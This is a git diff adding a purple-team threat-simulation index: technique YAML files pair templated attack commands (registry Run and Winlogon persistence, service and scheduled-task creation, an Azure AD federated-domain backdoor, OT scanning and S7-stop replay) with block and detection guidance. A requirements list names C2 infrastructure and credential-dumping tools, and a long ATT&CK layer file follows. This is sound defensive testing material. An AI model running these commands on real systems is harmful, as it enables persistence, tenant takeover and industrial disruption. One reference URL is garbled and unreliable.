diff --git a/ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml b/ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml
new file mode 100644
index 0000000..9af563a
--- /dev/null
+++ b/ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml
@@ -0,0 +1,18 @@
+name: MQTT C2 over TCP/1883
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over MQTT
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+- Look for unexpected network connections, such as those using MQTT, egressing from the internal network to the Internet by using network traffic logs, such as firewall logs and flow logs
+controls:
+- Firewall
+- ID/PS
+metadata:
+  id: 85c528ae-0337-45c8-a413-41d59a67b924
+  tid: T1071
+  tactic: TA0011
+  x_vectr_id: 85c528ae-0337-45c8-a413-41d59a67b924
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml b/ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml
new file mode 100644
index 0000000..3fb6416
--- /dev/null
+++ b/ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml
@@ -0,0 +1,17 @@
+name: Remote service login brute force for OT target
+description: Attempt to login as a user via a remote service (e.g. SSH, Telnet) using multiple passwords
+platforms:
+guidance:
+block:
+- Network security controls block source generating a large volume of connection requests
+detect:
+- Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs
+controls:
+- SIEM
+- Hardening
+metadata:
+  id: 9b542d39-29c9-4659-9756-6813426ff41b
+  tid: T1110.001
+  tactic: TA0006
+  x_vectr_id: 9b542d39-29c9-4659-9756-6813426ff41b
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml b/ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml
new file mode 100644
index 0000000..c0e2d9d
--- /dev/null
+++ b/ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml
@@ -0,0 +1,20 @@
+name: Replay PCAP for OT service command
+description: Replay a packet capture of a dangerous OT-specific service commands (e.g. S7 stop) to simulate the traffic for passive OT security controls
+platforms:
+guidance:
+- shell> tcpreplay -i {{ interface }} {{ pcap_file }}
+block:
+- ''
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+- Passive network security sensors detect anomalous network traffic
+controls:
+- Endpoint Protection
+- SIEM
+- ID/PS
+metadata:
+  id: b7cefb21-5835-478e-8541-b09d15c11948
+  tid: T1021
+  tactic: TA0008
+  x_vectr_id: b7cefb21-5835-478e-8541-b09d15c11948
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml b/ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml
new file mode 100644
index 0000000..72f3ea2
--- /dev/null
+++ b/ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml
@@ -0,0 +1,20 @@
+name: Network services scan against OT target
+description: Scan an OT system for OT-specific network services
+platforms:
+guidance:
+- shell> nmap -n -v --scan-delay 1 --open -Pn --script {{ scripts_directory }}  -oA {{ outfiles_name }} {{ cidr }}
+block:
+- Network security controls block source generating a large volume of connection requests
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- Firewall
+- ID/PS
+metadata:
+  id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608
+  tid: T1046
+  tactic: TA0007
+  x_references:
+  - https://github.com/cckuailong/ICS-Protocal-Detect-Nmap-Script/tree/master
+  x_vectr_id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608
+  isv: 1
diff --git a/ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+  id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  tid: T1098.005
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - htpts://aadinternals.nom/post/prt/
+  x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  isv: 1
diff --git a/ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  tid: T1053.005
+  tactic: TA0003
+  x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  isv: 1
diff --git a/ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  tid: T1543.003
+  tactic: TA0003
+  x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  isv: 1
diff --git a/ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml b/ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
new file mode 100644
index 0000000..e7228e9
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
@@ -0,0 +1,20 @@
+name: Persist via Registry "Run" key
+description: Run a payload during user login and startup by setting a registry run key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+  tid: T1547.001
+  tactic: TA0003
+  x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+  isv: 1
diff --git a/ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  tid: T1547.004
+  tactic: TA0003
+  x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  isv: 1
diff --git a/ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+  id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  tid: T1484.002
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - https://o365blog.com/post/aadbackdoor/
+  x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  isv: 1
diff --git a/rh-index-2024/CHANGELOG.md b/rh-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/rh-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/rh-index-2024/REQUIREMENTS.md b/rh-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..c04501a
--- /dev/null
+++ b/rh-index-2024/REQUIREMENTS.md
@@ -0,0 +1,37 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN 
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server 
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil), remote assistance service (if applicable)
+- Domain(s) and certificate(s) for infrastructure
+
+## Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - ISO|ISO||
+|2|Attachment - Zipped Macro|Macro-enabled Office document in zip||
+|3|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+|4|DLL execution using Rundll32|DLL||
+|5|Sideload a DLL into a legitimate application|DLL|can be shared with #4 as long as exported functions are as expected|
+|6|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|7|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|8|<Exfiltration>|Sensitive data|Use dlptest.com for sample data|
+
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- Net Scan : https://www.softperfect.com/products/networkscanner/
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- Rubeus : https://github.com/GhostPack/Rubeus
+- Nanodump : https://github.com/fortra/nanodump
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+- AADInternals : https://github.com/Gerenios/AADInternals
+
diff --git a/rh-index-2024/rh-index-2024-v1.0-layer.json b/rh-index-2024/rh-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..00b103b
--- /dev/null
+++ b/rh-index-2024/rh-index-2024-v1.0-layer.json
@@ -0,0 +1,3156 @@
+{
+    "description": "Retail and Hospitality Threat Simulation Index 2024 v1.0",
+    "domain": "enterprise-attack",
+    "layout": {
+        "layout": "flat"
+    },
+    "name": "Retail and Hospitality Threat Simulation Index 2024 v1.0",
+    "selectSubtechniquesWithParent": false,
+    "selectTechniquesAcrossTactics": false,
+    "techniques": [
+        {
+            "enabled": false,
+            "techniqueID": "T1001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.005"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1013"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1017"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1018"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1019"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1022"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1023"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1024"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1025"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1026"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1028"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1029"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1030"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1031"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1032"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1033"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1034"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1035"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1038"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1039"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1040"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1041"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1042"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1043"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1044"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1045"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1046"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1047"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1048"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1048"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1048.003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1048.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1049"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1050"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1051"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1053"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1053.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1054"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1056"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1056.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1057"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1058"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1060"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1061"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1062"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1063"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1064"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1065"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1066"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1067"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1068"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1070"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1070.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.009"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1072"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1073"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1075"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1076"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1077"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1078"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1078"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1079"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1080"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1081"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1082"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1083"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1084"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1085"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1086"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1087"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1087.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1087.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1088"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1089"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1090.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1091"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1092"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1093"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1094"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1095"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1096"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1097"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1098"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1098.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1098.005"
+        },
